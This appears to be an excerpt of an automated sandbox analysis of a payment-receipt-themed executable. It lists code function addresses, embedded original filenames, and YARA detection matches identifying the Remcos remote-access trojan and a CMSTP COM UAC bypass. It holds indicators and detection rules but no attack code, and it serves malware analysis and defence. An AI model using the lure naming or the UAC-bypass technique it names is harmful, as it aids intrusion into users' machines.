                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFEB900_2_06EFEB90
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFB0A80_2_06EFB0A8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFE0A80_2_06EFE0A8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFB0990_2_06EFB099
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFE0980_2_06EFE098
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF99F90_2_06EF99F9
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F4F7B00_2_06F4F7B0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F405F00_2_06F405F0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F400400_2_06F40040
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F405E00_2_06F405E0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F475E80_2_06F475E8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F492C00_2_06F492C0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F4A0780_2_06F4A078
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F4904F0_2_06F4904F
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F400070_2_06F40007
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F47E580_2_06F47E58
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F47A200_2_06F47A20
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F47A110_2_06F47A11
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_100171947_2_10017194
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_1000B5C17_2_1000B5C1
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_02C23E289_2_02C23E28
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_02C2E1049_2_02C2E104
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_02C26F9F9_2_02C26F9F
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_060A7A089_2_060A7A08
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_060A74489_2_060A7448
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_060A74589_2_060A7458
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_075865C09_2_075865C0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758DDF09_2_0758DDF0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758F4189_2_0758F418
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07587CAA9_2_07587CAA
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07588B289_2_07588B28
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758E3E89_2_0758E3E8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_075877089_2_07587708
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758E7D09_2_0758E7D0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758E7E09_2_0758E7E0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758AE189_2_0758AE18
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758AE089_2_0758AE08
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758654D9_2_0758654D
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_075865219_2_07586521
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758DDE29_2_0758DDE2
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758AC109_2_0758AC10
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758F4089_2_0758F408
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758AC019_2_0758AC01
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758E3D89_2_0758E3D8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758EB909_2_0758EB90
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758B2799_2_0758B279
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_075872719_2_07587271
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07585A609_2_07585A60
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07588A109_2_07588A10
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07589A089_2_07589A08
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07588ACA9_2_07588ACA
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_075899F99_2_075899F9
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758E0989_2_0758E098
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758B0999_2_0758B099
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758B0A89_2_0758B0A8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758E0A89_2_0758E0A8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_077900409_2_07790040
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0779EA079_2_0779EA07
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_077905F09_2_077905F0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_077975E89_2_077975E8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_077905E09_2_077905E0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_077992C09_2_077992C0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0779A0789_2_0779A078
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0779904F9_2_0779904F
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_077900079_2_07790007
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07797E589_2_07797E58
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07792CD89_2_07792CD8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07797A209_2_07797A20
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07797A119_2_07797A11
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004520E212_2_004520E2
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041D08112_2_0041D081
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0043D0A812_2_0043D0A8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0043716012_2_00437160
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004361BA12_2_004361BA
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0042626412_2_00426264
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0043138712_2_00431387
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0043652C12_2_0043652C
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041E5EF12_2_0041E5EF
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0044C74912_2_0044C749
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004367D612_2_004367D6
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_004267DB12_2_004267DB
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0043C9ED12_2_0043C9ED
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00432A5912_2_00432A59
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00436A9D12_2_00436A9D
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0043CC1C12_2_0043CC1C
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00436D5812_2_00436D58
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00434D3212_2_00434D32
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0043CE4B12_2_0043CE4B
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00440E3012_2_00440E30
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00426E8312_2_00426E83
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00412F4512_2_00412F45
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00452F1012_2_00452F10
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_00426FBD12_2_00426FBD
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0044B04015_2_0044B040
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0043610D15_2_0043610D
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0044731015_2_00447310
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0044A49015_2_0044A490
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0040755A15_2_0040755A
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0043C56015_2_0043C560
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0044B61015_2_0044B610
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0044D6C015_2_0044D6C0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_004476F015_2_004476F0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0044B87015_2_0044B870
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0044081D15_2_0044081D
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0041495715_2_00414957
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_004079EE15_2_004079EE
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00407AEB15_2_00407AEB
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0044AA8015_2_0044AA80
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00412AA915_2_00412AA9
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00404B7415_2_00404B74
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00404B0315_2_00404B03
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0044BBD815_2_0044BBD8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00404BE515_2_00404BE5
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00404C7615_2_00404C76
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00415CFE15_2_00415CFE
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00416D7215_2_00416D72
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00446D3015_2_00446D30
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00446D8B15_2_00446D8B
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_00406E8F15_2_00406E8F
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0040503817_2_00405038
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0041208C17_2_0041208C
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_004050A917_2_004050A9
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0040511A17_2_0040511A
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0043C13A17_2_0043C13A
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_004051AB17_2_004051AB
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0044930017_2_00449300
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0040D32217_2_0040D322
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0044A4F017_2_0044A4F0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0043A5AB17_2_0043A5AB
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0041363117_2_00413631
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0044669017_2_00446690
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0044A73017_2_0044A730
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_004398D817_2_004398D8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_004498E017_2_004498E0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0044A88617_2_0044A886
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0043DA0917_2_0043DA09
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_00438D5E17_2_00438D5E
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_00449ED017_2_00449ED0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_0041FE8317_2_0041FE83
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 17_2_00430F5417_2_00430F54
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_004050C218_2_004050C2
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_004014AB18_2_004014AB
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_0040513318_2_00405133
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_004051A418_2_004051A4
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_0040124618_2_00401246
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_0040CA4618_2_0040CA46
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_0040523518_2_00405235
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_004032C818_2_004032C8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_0040168918_2_00401689
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 18_2_00402F6018_2_00402F60
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: String function: 004020E7 appears 39 times
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: String function: 004338B5 appears 41 times
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: String function: 00433FC0 appears 55 times
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000000.2032689413.00000000002E6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamepUIh.exe: vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.00000000040F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2073657775.0000000007130000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2073865693.0000000008E60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2065392468.000000000082E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exeBinary or memory string: OriginalFileName vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exeBinary or memory string: OriginalFilenamepUIh.exe: vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
